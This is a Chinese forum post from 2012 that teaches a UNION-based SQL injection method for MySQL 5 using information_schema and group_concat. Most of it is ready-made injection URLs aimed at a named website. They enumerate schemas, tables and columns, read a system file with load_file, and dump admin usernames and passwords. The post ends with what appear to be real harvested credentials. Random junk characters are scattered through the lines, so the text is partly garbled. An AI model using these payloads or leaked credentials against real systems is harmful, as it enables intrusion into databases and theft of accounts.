此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似) T0 t8 |8 B1 U+ ^7 `4 P# M
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
9 B) r+ a3 I: T1 k9 s% S. s$ X# D! _, Z ~, ]+ ?
+ c" Z! |$ p4 ?% _6 \# b优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
+ C2 D, a9 `5 Q& v
( z. v# l( P# p' c3 f. P" N+ P缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
0 Q8 s) N6 T- \ e `, j
, f3 i4 B; M, F b1 P0 _下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示0 g4 S: V# O) D0 m! o+ u# E7 N7 `( ]
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等1 L# n* Y: c$ B5 @+ ?* _( Y$ B
/ z- `' G, @/ o6 \, y
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17/ i" ~0 W% G' C! ]' M' A3 Q4 t
& b) I: R: ?' U, U$ i, M) O& h2 U/ x读出所有库:
/ ?- g- N* `* E+ O6 }http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
% j9 c: V: t& O+ r8 r' Z
/ e; l- |4 l0 _8 t& b2 {2 E# W5 g- `& y& ~
. h9 P( @" k$ R3 b4 i
读出所有表:+ l' L2 {, @4 l3 z: B
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database(). e8 c# Y; G- ]# F$ [; x. v
* r. B4 y' m, w0 [+ A, {* a
读出所有表字段:! K; E6 g) R' v: a6 ^& W
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)3 `2 F. r, r0 W
*/ (97,100,109,105,110)为admin的ascii码 依次类推( p. c: V# J2 l5 A$ w! o
! K1 t; m: v) ^7 a读出所有表字段里的内容:
7 [* ~* s7 M0 zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin" g1 t9 _4 h2 y8 U, O
# u5 M7 i% T; ~- }
0 d+ C! R. e6 `, }- x
1 r5 X+ W' b5 `/ u" ~2 C7 e
5 {, z$ g4 O- {( [' q3 J/ r. q0 ? o. q1 u7 G# A
% w0 z9 ^' T6 _5 y+ V
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
7 w4 p+ Q" p, e4 v, ]: I% a# [7 o! a; U$ f1 @) C
, v" @, J1 |4 a" X) i8 u9 Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
0 B9 m+ }) c5 O( K) H$ V' s
- [4 _8 F. v. Ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23/ A9 c3 R6 w# t" j5 |! V+ E7 `
9 @) }) w5 D; `$ |1 x! u
6 l' ~. m4 P3 Q/ I
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
7 L) S" o+ @# O5 |
2 w' |- j$ z- F1 m; F _
3 P [1 Q, `9 h- F+ ]1 I1 c webmaster:dzb521123,simlab:simadmin20043233
. Z3 t5 {8 c1 d9 X1 V1 y |
发表于 2012-9-13 16:37:34
收藏
支持
反对